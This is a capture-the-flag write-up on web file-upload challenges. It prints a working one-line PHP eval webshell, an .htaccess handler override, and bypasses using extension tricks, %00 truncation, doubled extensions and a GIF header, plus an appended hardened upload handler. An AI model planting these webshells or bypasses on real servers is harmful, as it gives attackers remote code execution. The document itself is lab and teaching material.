CTFHub Web: File Upload

Posted by Kyon-H on July 2, 2025

1. File upload

1.1. No validation

Build a one-line webshell, shell.php:

<?php echo 123;@eval($_POST['code']);?>

Upload succeeds.

AntSword (蚁剑) retrieves the flag file.

1.2. Front-end validation

Upload shell.php.jpg, intercept the request in Burp and change the extension; upload succeeds, connect with AntSword.

1.3. .htaccess

Create and upload an .htaccess file:

<FilesMatch "wshell">
Sethandler application/x-httpd-php
</FilesMatch>

Upload the shell.gif webshell.

The code executes successfully.

1.4. MIME bypass

Upload shell.php.jpg, intercept the request in Burp and change the extension; upload succeeds, connect with AntSword.

1.5. Null-byte (00) truncation

Inspecting the source: the upload path is built from the GET parameter road plus a random number, a timestamp and the extension:

if (!empty($_POST['submit'])) {
    $name = basename($_FILES['file']['name']);
    $info = pathinfo($name);
    $ext = $info['extension'];
    $whitelist = array("jpg", "png", "gif");
    if (in_array($ext, $whitelist)) {
        // $_GET['road'] is client-controlled and becomes the directory part of the destination path
        $des = $_GET['road'] . "/" . rand(10, 99) . date("YmdHis") . "." . $ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $des)) {
            echo "<script>alert('上传成功')</script>";
        } else {
            echo "<script>alert('上传失败')</script>";
        }
    } else {
        echo "文件类型不匹配";
    }
}

Truncate the road parameter with %00; upload succeeds.

1.6. Doubled extension

The source strips blacklisted tokens from the filename with a string-replace function, so a doubled extension bypasses it:

$name = basename($_FILES['file']['name']);
$blacklist = array("php", "php5", "php4", "php3", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess", "ini");
// one pass per token, not repeated until stable: "pphphp" loses the inner "php" and collapses to "php"
$name = str_ireplace($blacklist, "", $name);

Uploading shell.pphphp succeeds; connect with AntSword.

1.7. File header check

Upload shell.php.gif, intercept in Burp and change the extension; file content:

GIF89a
<?php echo 123;@eval($_POST['code']);?>

Upload succeeds; connect with AntSword.
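As an added defensive counterpart (not part of this write-up or of the challenge code): a hardened replacement for the 1.5 handler that also closes the .htaccess (1.3), doubled-extension (1.6) and GIF-header (1.7) paths. It assumes PHP 8 with the GD and fileinfo extensions, and UPLOAD_DIR is an assumed directory outside the web root.

```php
<?php
// Added example, not from the write-up: hardened replacement for the handler in 1.5.
// Assumptions: PHP 8, GD + fileinfo extensions, UPLOAD_DIR is a directory outside
// the web root (assumed path), so nothing stored here is ever served or executed.
const UPLOAD_DIR = '/var/www/uploads_private';
const MAX_BYTES = 2 * 1024 * 1024;
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('upload rejected');
    }
    // The client never picks the directory (closes the %00 / road injection in 1.5),
    // and the stored extension comes from the detected type, not from the uploaded
    // name, so shell.php.jpg (1.2/1.4) and shell.pphphp (1.6) gain nothing.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('file type not allowed');
    }
    // Re-encode through GD: a bare "GIF89a" prefix followed by PHP code (1.7) is not
    // a decodable image, and a real image is rewritten from its pixels, so no
    // attacker-supplied bytes reach disk. An .htaccess upload (1.3) fails the type check.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a valid image');
    }
    $ext = $allowed[$mime];
    // Server-generated random name; no part of the client filename is reused.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    $ok = match ($ext) {
        'jpg' => imagejpeg($img, $dest, 90),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not store image');
    }
    return $dest;
}
if (!empty($_POST['submit']) && isset($_FILES['file'])) {
    try {
        store_upload($_FILES['file']);
        echo 'upload ok';
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

Re-encoding discards GIF animation and image metadata; where those must survive, keep at least the fixed directory, the random server-side name and storage outside the web root.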